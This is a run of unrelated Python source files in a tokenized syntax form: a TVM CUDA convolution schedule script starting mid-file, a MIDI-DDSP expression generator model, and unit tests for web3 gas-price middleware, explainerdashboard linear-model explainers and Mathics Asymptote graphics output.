ty)<line_sep>s[cache].bind(bindz tz)<block_end>s[outputs].pragma(kernel_scope 'auto_unroll_max_step' 1500)<line_sep>s[outputs].pragma(kernel_scope 'unroll_explicit' 1)<line_sep>s[padded].compute_inline()<block_end><def_stmt>schedule_yolo_conv_cuda_2 s outputs inputs weight parameter# inline the padding operation <block_start>padded=outputs.op.input_tensors[0]<line_sep># create cache write_cache=s.cache_write(outputs "local")<line_sep>read_share_weight=s.cache_read(weight "shared" [write_cache])<line_sep># read_local_weight = s.cache_read(read_share_weight, "local", [write_cache]) read_share_inputs=s.cache_read(padded "shared" [write_cache])<line_sep># read_local_inputs = s.cache_read(read_share_inputs, "local", [write_cache]) b_factors=parameter.b_factors<line_sep>k_factors=parameter.k_factors<line_sep>p_factors=parameter.p_factors<line_sep>q_factors=parameter.q_factors<line_sep>rc_factors=parameter.rc_factors<line_sep>ry_factors=parameter.ry_factors<line_sep>rx_factors=parameter.rx_factors<line_sep># prepare thread_axis bx=tvm.te.thread_axis("blockIdx.x")<line_sep>by=tvm.te.thread_axis("blockIdx.y")<line_sep>bz=tvm.te.thread_axis("blockIdx.z")<line_sep>vx=tvm.te.thread_axis("vthread")<line_sep>vy=tvm.te.thread_axis("vthread")<line_sep>vz=tvm.te.thread_axis("vthread")<line_sep>tx=tvm.te.thread_axis("threadIdx.x")<line_sep>ty=tvm.te.thread_axis("threadIdx.y")<line_sep>tz=tvm.te.thread_axis("threadIdx.z")<line_sep># split the spatial axes b,k,p,q=s[outputs].op.axis<line_sep>kernel_scope,b=s[outputs].split(b nparts=1)<line_sep>ko,ki=s[outputs].split(k nparts=k_factors[0])<line_sep>po,pi=s[outputs].split(p nparts=p_factors[0])<line_sep>qo,qi=s[outputs].split(q nparts=q_factors[0])<line_sep>vko,ki=s[outputs].split(ki nparts=k_factors[1])<line_sep>vpo,pi=s[outputs].split(pi nparts=p_factors[1])<line_sep>vqo,qi=s[outputs].split(qi nparts=q_factors[1])<line_sep>tko,ki=s[outputs].split(ki nparts=k_factors[2])<line_sep>tpo,pi=s[outputs].split(pi nparts=p_factors[2])<line_sep>tqo,qi=s[outputs].split(qi nparts=q_factors[2])<line_sep># reorder s[outputs].reorder(ko po qo vko vpo vqo tko tpo tqo ki pi qi)<line_sep># s[outputs].reorder(po, bko, qo, vqo, vbko, vpo, tbko, tpo, tqo, bki, pi, qi) # fuse bko=s[outputs].fuse(b ko)<line_sep># bind s[outputs].bind(bko bz)<line_sep>s[outputs].bind(po by)<line_sep>s[outputs].bind(qo bx)<line_sep>s[outputs].bind(vko vz)<line_sep>s[outputs].bind(vpo vy)<line_sep>s[outputs].bind(vqo vx)<line_sep>s[outputs].bind(tko tz)<line_sep>s[outputs].bind(tpo ty)<line_sep>s[outputs].bind(tqo tx)<line_sep># compute at write cache s[write_cache].compute_at(s[outputs] tqo)<line_sep>rc,ry,rx=s[write_cache].op.reduce_axis<line_sep>rco,rci=s[write_cache].split(rc nparts=rc_factors[0])<line_sep>rcm,rci=s[write_cache].split(rci nparts=rc_factors[1])<line_sep>ryo,ryi=s[write_cache].split(ry nparts=ry_factors[0])<line_sep>rym,ryi=s[write_cache].split(ryi nparts=ry_factors[1])<line_sep>rxo,rxi=s[write_cache].split(rx nparts=rx_factors[0])<line_sep>rxm,rxi=s[write_cache].split(rxi nparts=rx_factors[1])<line_sep>a,b,c,d=s[write_cache].op.axis<line_sep>s[write_cache].reorder(rco ryo rxo rcm rym rxm rci ryi rxi a b c d)<line_sep># compute at read cache s[read_share_weight].compute_at(s[write_cache] rxm)<line_sep># s[read_local_weight].compute_at(s[write_cache], rxi) s[read_share_inputs].compute_at(s[write_cache] rxm)<line_sep># s[read_local_inputs].compute_at(s[write_cache], rxi) # cooperative fetching <for_stmt>cache [read_share_inputs read_share_weight]<block_start>cb,ck,ch,cw=s[cache].op.axis<line_sep>fused=s[cache].fuse(cb ck ch cw)<line_sep>fused,bindx=s[cache].split(fused factor=q_factors[2])<line_sep>fused,bindy=s[cache].split(fused factor=p_factors[2])<line_sep>fused,bindz=s[cache].split(fused factor=k_factors[2])<line_sep>s[cache].bind(bindx tx)<line_sep>s[cache].bind(bindy ty)<line_sep>s[cache].bind(bindz tz)<block_end>s[outputs].pragma(kernel_scope 'auto_unroll_max_step' 1500)<line_sep>s[outputs].pragma(kernel_scope 'unroll_explicit' 1)<line_sep>s[padded].compute_inline()<block_end><def_stmt>schedule_yolo_conv_cuda_3 s outputs inputs weight parameter# inline the padding operation <block_start>padded=outputs.op.input_tensors[0]<line_sep># create cache write_cache=s.cache_write(outputs "local")<line_sep>read_share_weight=s.cache_read(weight "shared" [write_cache])<line_sep># read_local_weight = s.cache_read(read_share_weight, "local", [write_cache]) read_share_inputs=s.cache_read(padded "shared" [write_cache])<line_sep># read_local_inputs = s.cache_read(read_share_inputs, "local", [write_cache]) b_factors=parameter.b_factors<line_sep>k_factors=parameter.k_factors<line_sep>p_factors=parameter.p_factors<line_sep>q_factors=parameter.q_factors<line_sep>rc_factors=parameter.rc_factors<line_sep>ry_factors=parameter.ry_factors<line_sep>rx_factors=parameter.rx_factors<line_sep># prepare thread_axis bx=tvm.te.thread_axis("blockIdx.x")<line_sep>by=tvm.te.thread_axis("blockIdx.y")<line_sep>bz=tvm.te.thread_axis("blockIdx.z")<line_sep>vx=tvm.te.thread_axis("vthread")<line_sep>vy=tvm.te.thread_axis("vthread")<line_sep>vz=tvm.te.thread_axis("vthread")<line_sep>tx=tvm.te.thread_axis("threadIdx.x")<line_sep>ty=tvm.te.thread_axis("threadIdx.y")<line_sep>tz=tvm.te.thread_axis("threadIdx.z")<line_sep># split the spatial axes b,k,p,q=s[outputs].op.axis<line_sep>kernel_scope,b=s[outputs].split(b nparts=1)<line_sep>bo,bi=s[outputs].split(b nparts=b_factors[0])<line_sep>ko,ki=s[outputs].split(k nparts=k_factors[0])<line_sep>po,pi=s[outputs].split(p nparts=p_factors[0])<line_sep>qo,qi=s[outputs].split(q nparts=q_factors[0])<line_sep>vbo,bi=s[outputs].split(bi nparts=b_factors[1])<line_sep>vko,ki=s[outputs].split(ki nparts=k_factors[1])<line_sep>vpo,pi=s[outputs].split(pi nparts=p_factors[1])<line_sep>vqo,qi=s[outputs].split(qi nparts=q_factors[1])<line_sep>tbo,bi=s[outputs].split(bi nparts=b_factors[2])<line_sep>tko,ki=s[outputs].split(ki nparts=k_factors[2])<line_sep>tpo,pi=s[outputs].split(pi nparts=p_factors[2])<line_sep>tqo,qi=s[outputs].split(qi nparts=q_factors[2])<line_sep># reorder s[outputs].reorder(bo ko po qo vbo vko vpo vqo tbo tko tpo tqo bi ki pi qi)<line_sep># fuse outer=s[outputs].fuse(bo ko po qo)<line_sep>middle=s[outputs].fuse(vbo vko vpo vqo)<line_sep>inner=s[outputs].fuse(tbo tko tpo tqo)<line_sep># bind s[outputs].bind(outer bx)<line_sep>s[outputs].bind(inner tx)<line_sep># compute at write cache s[write_cache].compute_at(s[outputs] inner)<line_sep>rc,ry,rx=s[write_cache].op.reduce_axis<line_sep>rco,rci=s[write_cache].split(rc nparts=rc_factors[0])<line_sep>rcm,rci=s[write_cache].split(rci nparts=rc_factors[1])<line_sep>ryo,ryi=s[write_cache].split(ry nparts=ry_factors[0])<line_sep>rym,ryi=s[write_cache].split(ryi nparts=ry_factors[1])<line_sep>rxo,rxi=s[write_cache].split(rx nparts=rx_factors[0])<line_sep>rxm,rxi=s[write_cache].split(rxi nparts=rx_factors[1])<line_sep>a,b,c,d=s[write_cache].op.axis<line_sep>s[write_cache].reorder(rco ryo rxo rcm rym rxm rci ryi rxi a b c d)<line_sep># compute at read cache s[read_share_weight].compute_at(s[write_cache] rxm)<line_sep># s[read_local_weight].compute_at(s[write_cache], rxi) s[read_share_inputs].compute_at(s[write_cache] rxm)<line_sep># s[read_local_inputs].compute_at(s[write_cache], rxi) # cooperative fetching <for_stmt>cache [read_share_inputs read_share_weight]<block_start>cb,ck,ch,cw=s[cache].op.axis<line_sep>fused=s[cache].fuse(cb ck ch cw)<line_sep>fused,bindx=s[cache].split(fused factor=b_factors[2]<times>k_factors[2]<times>p_factors[2]<times>q_factors[2])<line_sep>s[cache].bind(bindx tx)<block_end>s[outputs].pragma(kernel_scope 'auto_unroll_max_step' 1500)<line_sep>s[outputs].pragma(kernel_scope 'unroll_explicit' 1)<line_sep>s[padded].compute_inline()<block_end><def_stmt>schedule_yolo_conv_opencl s outputs inputs weight# inline the padding operation <block_start>padded=outputs.op.input_tensors[0]<line_sep># prepare thread_axis bx=tvm.te.thread_axis("blockIdx.x")<line_sep># split the spatial axes b,k,p,q=s[outputs].op.axis<line_sep>bo,bi=s[outputs].split(b nparts=1)<line_sep>s[outputs].bind(bo bx)<line_sep>s[padded].compute_inline()<block_end><def_stmt>try_yolo_conv config parameter fsch# get the compute # (1, 3, 448, 448, 64, 3, 7, 7, 1, 2, 3, 1, 1) <block_start>batch,CI,H,W,CO,_,kh,kw,_,st,pad,dilation,group=config<line_sep>inputs=tvm.te.placeholder((batch CI H W) dtype="float32")<line_sep>weight=tvm.te.placeholder((CO CI kh kw) dtype="float32")<line_sep>outputs=conv2d_nchw(inputs weight stride=st padding=pad dilation=dilation groups=group)<line_sep>s=tvm.te.create_schedule(outputs.op)<line_sep>fsch(s outputs inputs weight parameter)<line_sep>arg_bufs=[inputs weight outputs]<line_sep>stmt=tvm.lower(s arg_bufs simple_mode=<true>)<line_sep># print(stmt) dev_id=2<line_sep>ctx=tvm.nd.context("cuda" dev_id)<line_sep>max_dims=ctx.max_thread_dimensions<line_sep>kwargs={"max_shared_memory_per_block":ctx.max_shared_memory_per_block "max_threads_per_block":ctx.max_threads_per_block "max_thread_x":max_dims[0] "max_thread_y":max_dims[1] "max_thread_z":max_dims[2]}<line_sep>verify=tvm.tir.ir_pass.VerifyGPUCode(stmt kwargs)<line_sep># print("config is:\n %s" % (str(config))) <if_stmt>verify<block_start>print("Valid kernel")<line_sep>time_cost=_evaluate(s arg_bufs "cuda" dev_id 10)<line_sep>print("Yolo conv use" time_cost "ms\n")<block_end><else_stmt><block_start>print("Invalid kernel")<line_sep>time_cost=float("inf")<block_end><return>time_cost<block_end><if_stmt>__name__<eq>"__main__"<block_start>res=[]<line_sep>parameters=[]<with_stmt>open("yolo_conv_b8_parameters.txt" "r")<as>fin<block_start><for_stmt>line fin<block_start>_,content=line.split(":" 1)<line_sep>obj=json.loads(content)<line_sep>op_parameters=obj[0]<line_sep>conv_parameters=op_parameters[1]<line_sep>parameter=Parameter()<line_sep>parameter.b_factors=conv_parameters["spatial"][0]<line_sep>parameter.k_factors=conv_parameters["spatial"][1]<line_sep>parameter.p_factors=conv_parameters["spatial"][2]<line_sep>parameter.q_factors=conv_parameters["spatial"][3]<line_sep>parameter.rc_factors=conv_parameters["reduce"][0]<line_sep>parameter.ry_factors=conv_parameters["reduce"][1]<line_sep>parameter.rx_factors=conv_parameters["reduce"][2]<line_sep>parameters.append(parameter)<block_end><block_end><for_stmt>config,parameter list(zip(yolo_shapes_b8 parameters))[:]<block_start>cost=try_yolo_conv(config parameter schedule_yolo_conv_cuda_3)<line_sep>res.append(cost)<block_end><for_stmt>ele res<block_start>print(ele)<block_end><block_end>
# Copyright 2022 The MIDI-DDSP Authors. # # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Expression generator module class."""<import_from_stmt>abc ABC<import_stmt>tensorflow<as>tf<import_from_stmt>ddsp.training nn<import_from_stmt>midi_ddsp.data_handling.instrument_name_utils NUM_INST<import_from_stmt>midi_ddsp.modules.cond_rnn TwoLayerCondAutoregRNN<line_sep>tfk=tf.keras<line_sep>tfkl=tfk.layers<class_stmt>LangModelOutputLayer(tfkl.Layer)<block_start><def_stmt>__init__ self n_out nhid=256<block_start>super().__init__()<line_sep>self.n_out=n_out<line_sep>self.dense_out=nn.FcStackOut(ch=nhid layers=2 n_out=self.n_out)<block_end><def_stmt>call self inputs<block_start>outputs=self.dense_out(inputs)<line_sep>outputs={'raw_output':outputs}<line_sep><return>outputs<block_end><block_end><class_stmt>ExpressionGenerator(TwoLayerCondAutoregRNN tf.keras.Model ABC)<block_start>"""Expression Generator that takes note sequence as input and predicts note expression controls."""<line_sep># TODO:(yusongwu) merge teacher_force and autoregressive function, # things need to change: # def sample_out(self, out, cond, time, training=False): # curr_out = self.sample_out(curr_out, cond, i, training=training) # output = self.split_teacher_force_output(output, cond) <def_stmt>__init__ self n_out=6 nhid=128 norm=<true> dropout=0.5<block_start>super().__init__(nhid=nhid n_out=n_out input_dropout=<true> input_dropout_p=0.5 dropout=dropout )<line_sep>self.birnn=tfkl.Bidirectional(tfkl.GRU(units=nhid return_sequences=<true> dropout=dropout) )<line_sep>self.dense_out=LangModelOutputLayer(nhid=nhid n_out=self.n_out)<line_sep>self.norm=nn.Normalize('layer')<if>norm<else><none><line_sep>self.pitch_emb=tfkl.Embedding(128 64)<line_sep>self.duration_emb=tfkl.Dense(64)<line_sep>self.instrument_emb=tfkl.Embedding(NUM_INST 64)<block_end><def_stmt>autoregressive self cond training=<false><block_start>note_pitch=cond['note_pitch'][<ellipsis> tf.newaxis]<line_sep>cond=self.encode_cond(cond training=training)<line_sep>batch_size=cond.shape[0]<line_sep>length=cond.shape[1]<line_sep>prev_out=tf.tile([[0.0]] [batch_size self.n_out])[: tf.newaxis :]<line_sep># go_frame prev_states=(<none> <none>)<line_sep>overall_outputs=[]<for_stmt>i range(length)<block_start>curr_cond=cond[: i :][: tf.newaxis :]<line_sep>prev_out=self.encode_out(prev_out)<line_sep>curr_out,curr_states=self._one_step(curr_cond prev_out prev_states training=training)<line_sep>curr_out=self.sample_out(curr_out note_pitch[: i :][: tf.newaxis :])<line_sep>overall_outputs.append(curr_out)<line_sep>prev_out,prev_states=curr_out['output'] curr_states<block_end>outputs={}<for_stmt>k curr_out.keys()<block_start>outputs[k]=tf.concat([x[k]<for>x overall_outputs] 1)<block_end><return>outputs<block_end><def_stmt>teacher_force self cond out training=<true><block_start>note_pitch=cond['note_pitch'][<ellipsis> tf.newaxis]<line_sep>out_shifted=self.right_shift_encode_out(out)<line_sep>cond=self.encode_cond(cond training=training)<line_sep>z_in=tf.concat([cond out_shifted] -1)<line_sep>z_out,*states=self.rnn1(z_in training=training)<line_sep>z_out,*states=self.rnn2(z_out training=training)<line_sep>output=self.decode_out(z_out)<line_sep>output=self.sample_out(output note_pitch)<line_sep><return>output<block_end><def_stmt>encode_cond self cond training=<false><block_start>z_pitch=self.pitch_emb(cond['note_pitch'])<line_sep>z_duration=self.duration_emb(cond['note_length'])<line_sep>z_instrument=self.instrument_emb(tf.tile(cond['instrument_id'][: tf.newaxis] [1 z_pitch.shape[1]]))<line_sep>cond=tf.concat([z_pitch z_duration z_instrument] -1)<line_sep>cond=self.birnn(cond training=training)<line_sep><return>cond<block_end><def_stmt>decode_out self z_out<block_start><if_stmt>self.norm<is><not><none><block_start>z_out=self.norm(z_out)<block_end>output=self.dense_out(z_out)<line_sep><return>output<block_end><def_stmt>sample_out self out note_pitch<block_start>output=out.copy()<line_sep>sampled_output=out['raw_output']<line_sep>rest_note_mask=tf.cast(note_pitch<ne>0 tf.float32)<line_sep>sampled_output<augmul>rest_note_mask<line_sep>output['output']=sampled_output<line_sep><return>output<block_end><def_stmt>call self cond out=<none> training=<false><block_start><if_stmt>training<block_start>outputs=self.teacher_force(cond out training=training)<block_end><else_stmt><block_start>outputs=self.autoregressive(cond training=training)<block_end><return>outputs<block_end><block_end><def_stmt>get_fake_data_expression_generator target_dim<block_start>instrument_id=tf.ones([1] dtype=tf.int64)<line_sep>cond={'note_pitch':tf.ones([1 32] dtype=tf.int64) 'note_length':tf.ones([1 32 1] dtype=tf.float32) 'instrument_id':instrument_id}<line_sep>target=tf.ones([1 32 target_dim] dtype=tf.float32)<line_sep>fake_data={'cond':cond 'target':target}<line_sep><return>fake_data<block_end>
<import_stmt>pytest<import_from_stmt>unittest.mock Mock <import_from_stmt>web3.middleware gas_price_strategy_middleware <line_sep>@pytest.fixture<def_stmt>the_gas_price_strategy_middleware web3<block_start>make_request,web3=Mock() Mock()<line_sep>initialized=gas_price_strategy_middleware(make_request web3)<line_sep>initialized.web3=web3<line_sep>initialized.make_request=make_request<line_sep><return>initialized<block_end><def_stmt>test_gas_price_generated the_gas_price_strategy_middleware<block_start>the_gas_price_strategy_middleware.web3.eth.generate_gas_price.return_value=5<line_sep>method='eth_sendTransaction'<line_sep>params=({'to':'0x0' 'value':1 } )<line_sep>the_gas_price_strategy_middleware(method params)<line_sep>the_gas_price_strategy_middleware.web3.eth.generate_gas_price.assert_called_once_with({'to':'0x0' 'value':1 })<line_sep>the_gas_price_strategy_middleware.make_request.assert_called_once_with(method ({'to':'0x0' 'value':1 'gasPrice':'0x5' } ))<block_end><def_stmt>test_gas_price_not_overridden the_gas_price_strategy_middleware<block_start>the_gas_price_strategy_middleware.web3.eth.generate_gas_price.return_value=5<line_sep>method='eth_sendTransaction'<line_sep>params=({'to':'0x0' 'value':1 'gasPrice':10 } )<line_sep>the_gas_price_strategy_middleware(method params)<line_sep>the_gas_price_strategy_middleware.make_request.assert_called_once_with(method ({'to':'0x0' 'value':1 'gasPrice':10 } ))<block_end><def_stmt>test_gas_price_not_set_without_gas_price_strategy the_gas_price_strategy_middleware<block_start>the_gas_price_strategy_middleware.web3.eth.generate_gas_price.return_value=<none><line_sep>method='eth_sendTransaction'<line_sep>params=({'to':'0x0' 'value':1 } )<line_sep>the_gas_price_strategy_middleware(method params)<line_sep>the_gas_price_strategy_middleware.make_request.assert_called_once_with(method params)<block_end><def_stmt>test_not_generate_gas_price_when_not_send_transaction_rpc the_gas_price_strategy_middleware<block_start>the_gas_price_strategy_middleware.web3.getGasPriceStrategy=Mock()<line_sep>the_gas_price_strategy_middleware('eth_getBalance' [])<line_sep>the_gas_price_strategy_middleware.web3.getGasPriceStrategy.assert_not_called()<block_end>
<import_stmt>unittest<import_stmt>pandas<as>pd<import_stmt>numpy<as>np<import_stmt>shap<import_stmt>plotly.graph_objects<as>go<import_from_stmt>sklearn.linear_model LinearRegression LogisticRegression<import_from_stmt>explainerdashboard.explainers RegressionExplainer ClassifierExplainer<import_from_stmt>explainerdashboard.datasets titanic_fare titanic_survive titanic_names<class_stmt>LinearRegressionTests(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>X_train,y_train,X_test,y_test=titanic_fare()<line_sep>self.test_len=len(X_test)<line_sep>train_names,test_names=titanic_names()<line_sep>_,self.names=titanic_names()<line_sep>model=LinearRegression()<line_sep>model.fit(X_train y_train)<line_sep>self.explainer=RegressionExplainer(model X_test y_test shap='linear' cats=[{'Gender':['Sex_female' 'Sex_male' 'Sex_nan']} 'Deck' 'Embarked'] idxs=test_names units="$")<block_end><def_stmt>test_explainer_len self<block_start>self.assertEqual(len(self.explainer) self.test_len)<block_end><def_stmt>test_int_idx self<block_start>self.assertEqual(self.explainer.get_idx(self.names[0]) 0)<block_end><def_stmt>test_random_index self<block_start>self.assertIsInstance(self.explainer.random_index() int)<line_sep>self.assertIsInstance(self.explainer.random_index(return_str=<true>) str)<block_end><def_stmt>test_preds self<block_start>self.assertIsInstance(self.explainer.preds np.ndarray)<block_end><def_stmt>test_pred_percentiles self<block_start>self.assertIsInstance(self.explainer.pred_percentiles() np.ndarray)<block_end><def_stmt>test_permutation_importances self<block_start>self.assertIsInstance(self.explainer.get_permutation_importances_df() pd.DataFrame)<block_end><def_stmt>test_metrics self<block_start>self.assertIsInstance(self.explainer.metrics() dict)<line_sep>self.assertIsInstance(self.explainer.metrics_descriptions() dict)<block_end><def_stmt>test_mean_abs_shap_df self<block_start>self.assertIsInstance(self.explainer.get_mean_abs_shap_df() pd.DataFrame)<block_end><def_stmt>test_top_interactions self<block_start>self.assertIsInstance(self.explainer.top_shap_interactions("Age") list)<line_sep>self.assertIsInstance(self.explainer.top_shap_interactions("Age" topx=4) list)<block_end><def_stmt>test_contrib_df self<block_start>self.assertIsInstance(self.explainer.get_contrib_df(0) pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.get_contrib_df(0 topx=3) pd.DataFrame)<block_end><def_stmt>test_shap_base_value self<block_start>self.assertIsInstance(self.explainer.shap_base_value() (np.floating float))<block_end><def_stmt>test_shap_values_shape self<block_start>self.assertTrue(self.explainer.get_shap_values_df().shape<eq>(len(self.explainer) len(self.explainer.merged_cols)))<block_end><def_stmt>test_shap_values self<block_start>self.assertIsInstance(self.explainer.get_shap_values_df() pd.DataFrame)<block_end><def_stmt>test_mean_abs_shap self<block_start>self.assertIsInstance(self.explainer.get_mean_abs_shap_df() pd.DataFrame)<block_end><def_stmt>test_calculate_properties self<block_start>self.explainer.calculate_properties(include_interactions=<false>)<block_end><def_stmt>test_pdp_df self<block_start>self.assertIsInstance(self.explainer.pdp_df("Age") pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Gender") pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Deck") pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Age" index=0) pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Gender" index=0) pd.DataFrame)<block_end><block_end><class_stmt>LogisticRegressionTests(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>X_train,y_train,X_test,y_test=titanic_survive()<line_sep>train_names,test_names=titanic_names()<line_sep>model=LogisticRegression()<line_sep>model.fit(X_train y_train)<line_sep>self.explainer=ClassifierExplainer(model X_test y_test shap='linear' cats=['Sex' 'Deck' 'Embarked'] labels=['Not survived' 'Survived'] idxs=test_names)<block_end><def_stmt>test_preds self<block_start>self.assertIsInstance(self.explainer.preds np.ndarray)<block_end><def_stmt>test_pred_percentiles self<block_start>self.assertIsInstance(self.explainer.pred_percentiles() np.ndarray)<block_end><def_stmt>test_columns_ranked_by_shap self<block_start>self.assertIsInstance(self.explainer.columns_ranked_by_shap() list)<block_end><def_stmt>test_permutation_importances self<block_start>self.assertIsInstance(self.explainer.get_permutation_importances_df() pd.DataFrame)<block_end><def_stmt>test_metrics self<block_start>self.assertIsInstance(self.explainer.metrics() dict)<line_sep>self.assertIsInstance(self.explainer.metrics_descriptions() dict)<block_end><def_stmt>test_mean_abs_shap_df self<block_start>self.assertIsInstance(self.explainer.get_mean_abs_shap_df() pd.DataFrame)<block_end><def_stmt>test_contrib_df self<block_start>self.assertIsInstance(self.explainer.get_contrib_df(0) pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.get_contrib_df(0 topx=3) pd.DataFrame)<block_end><def_stmt>test_shap_base_value self<block_start>self.assertIsInstance(self.explainer.shap_base_value() (np.floating float))<block_end><def_stmt>test_shap_values_shape self<block_start>self.assertTrue(self.explainer.get_shap_values_df().shape<eq>(len(self.explainer) len(self.explainer.merged_cols)))<block_end><def_stmt>test_shap_values self<block_start>self.assertIsInstance(self.explainer.get_shap_values_df() pd.DataFrame)<block_end><def_stmt>test_mean_abs_shap self<block_start>self.assertIsInstance(self.explainer.get_mean_abs_shap_df() pd.DataFrame)<block_end><def_stmt>test_calculate_properties self<block_start>self.explainer.calculate_properties(include_interactions=<false>)<block_end><def_stmt>test_pdp_df self<block_start>self.assertIsInstance(self.explainer.pdp_df("Age") pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Sex") pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Deck") pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Age" index=0) pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Sex" index=0) pd.DataFrame)<block_end><def_stmt>test_pos_label self<block_start>self.explainer.pos_label=1<line_sep>self.explainer.pos_label="Not survived"<line_sep>self.assertIsInstance(self.explainer.pos_label int)<line_sep>self.assertIsInstance(self.explainer.pos_label_str str)<line_sep>self.assertEqual(self.explainer.pos_label 0)<line_sep>self.assertEqual(self.explainer.pos_label_str "Not survived")<block_end><def_stmt>test_pred_probas self<block_start>self.assertIsInstance(self.explainer.pred_probas() np.ndarray)<block_end><def_stmt>test_metrics self<block_start>self.assertIsInstance(self.explainer.metrics() dict)<line_sep>self.assertIsInstance(self.explainer.metrics(cutoff=0.9) dict)<block_end><def_stmt>test_precision_df self<block_start>self.assertIsInstance(self.explainer.get_precision_df() pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.get_precision_df(multiclass=<true>) pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.get_precision_df(quantiles=4) pd.DataFrame)<block_end><def_stmt>test_lift_curve_df self<block_start>self.assertIsInstance(self.explainer.get_liftcurve_df() pd.DataFrame)<block_end><block_end><class_stmt>LogisticRegressionKernelTests(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>X_train,y_train,X_test,y_test=titanic_survive()<line_sep>train_names,test_names=titanic_names()<line_sep>model=LogisticRegression()<line_sep>model.fit(X_train y_train)<line_sep>self.explainer=ClassifierExplainer(model X_test.iloc[:20] y_test.iloc[:20] shap='kernel' model_output='probability' X_background=shap.sample(X_train 5) cats=[{'Gender':['Sex_female' 'Sex_male' 'Sex_nan']} 'Deck' 'Embarked'] labels=['Not survived' 'Survived'])<block_end><def_stmt>test_shap_values self<block_start>self.assertIsInstance(self.explainer.shap_base_value() (np.floating float))<line_sep>self.assertTrue(self.explainer.get_shap_values_df().shape<eq>(len(self.explainer) len(self.explainer.merged_cols)))<line_sep>self.assertIsInstance(self.explainer.get_shap_values_df() pd.DataFrame)<block_end><block_end><class_stmt>LinearRegressionKernelTests(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>X_train,y_train,X_test,y_test=titanic_fare()<line_sep>self.test_len=len(X_test)<line_sep>model=LinearRegression().fit(X_train y_train)<line_sep>self.explainer=RegressionExplainer(model X_test.iloc[:20] y_test.iloc[:20] shap='kernel' X_background=shap.sample(X_train 5))<block_end><def_stmt>test_shap_values self<block_start>self.assertIsInstance(self.explainer.shap_base_value() (np.floating float))<line_sep>self.assertTrue(self.explainer.get_shap_values_df().shape<eq>(len(self.explainer) len(self.explainer.merged_cols)))<line_sep>self.assertIsInstance(self.explainer.get_shap_values_df() pd.DataFrame)<block_end><block_end>
<import_stmt>re<import_from_stmt>mathics.core.expression Symbol Integer0 Integer1 Expression<import_from_stmt>mathics.core.evaluation Evaluation<import_from_stmt>mathics.session MathicsSession<import_from_stmt>mathics.builtin.inout MakeBoxes<line_sep>session=MathicsSession(add_builtin=<true> catch_interrupt=<false>)<line_sep>evaluation=Evaluation(session.definitions)<line_sep>GraphicsSymbol=Symbol("Graphics")<line_sep>ListSymbol=Symbol("List")<line_sep>asy_wrapper_pat=r"""^\s* \s*\\begin{asy} \s*usepackage\("amsmath"\); \s*size\(.+\); \s* """<def_stmt>extract_asy_body asy<block_start>matches=re.match(asy_wrapper_pat asy)<line_sep>body=asy[len(matches.group(0)):]<assert_stmt>matches<line_sep>print(body)<line_sep><return>body<block_end><def_stmt>get_asy expression<block_start>boxes=MakeBoxes(expression).evaluate(evaluation)<line_sep><return>boxes.boxes_to_tex()<block_end><def_stmt>test_asy_circle <block_start>expression=Expression(GraphicsSymbol Expression("Circle" Expression(ListSymbol Integer0 Integer0)) )<line_sep>asy=get_asy(expression)<line_sep>inner_asy=extract_asy_body(asy)<line_sep># Circles are implemented as ellipses with equal major and minor axes. # Check for that. matches=re.match(r"^draw\(ellipse\(\((.+),\s*(.+)\),(.*),(.*)\), .*" inner_asy)<assert_stmt>matches<line_sep># Check that center point is centered and # major and minor axes are the same <assert_stmt>matches.group(1)<eq>matches.group(2)<assert_stmt>matches.group(3)<eq>matches.group(4)<block_end><def_stmt>test_asy_point <block_start>expression=Expression(GraphicsSymbol Expression("Point" Expression(ListSymbol Integer0 Integer0)) )<line_sep>asy=get_asy(expression)<line_sep>inner_asy=extract_asy_body(asy)<line_sep>print(inner_asy)<line_sep># matches = re.match(r'^Circle\((.+), (.+), (.+)\),.+;', inner_asy) matches=re.match(r"// PointBox\ndot\(\((.+), (.+)\), .+\);.*" inner_asy)<assert_stmt>matches<line_sep># Since the x,y point is the same, we'll check that whatever this # coordinate mapped to, it is the same. <assert_stmt>matches.group(1)<eq>matches.group(2)<block_end><def_stmt>test_asy_arrowbox <block_start>expression=Expression(GraphicsSymbol Expression("Arrow" Expression(ListSymbol Expression(ListSymbol Integer0 Integer0) Expression(ListSymbol Integer1 Integer1) ) ) )<line_sep>asy=get_asy(expression)<line_sep>inner_asy=extract_asy_body(asy)<line_sep>matches=re.match(r"^draw\(.*\)" inner_asy)<line_sep># TODO: Match line and arrowbox <assert_stmt>matches<block_end><def_stmt>test_asy_bezier_curve <block_start>expression=Expression(GraphicsSymbol Expression("BezierCurve" Expression(ListSymbol Expression(ListSymbol Integer0 Integer0) Expression(ListSymbol Integer1 Integer1) ) ) )<line_sep>asy=get_asy(expression)<line_sep>inner_asy=extract_asy_body(asy)<line_sep>matches=re.match(r"// BezierCurveBox\nimport graph;" inner_asy)<line_sep># TODO: Match line and arrowbox <assert_stmt>matches<block_end><if_stmt>__name__<eq>"__main__"<block_start>test_asy_bezier_curve()<block_end>
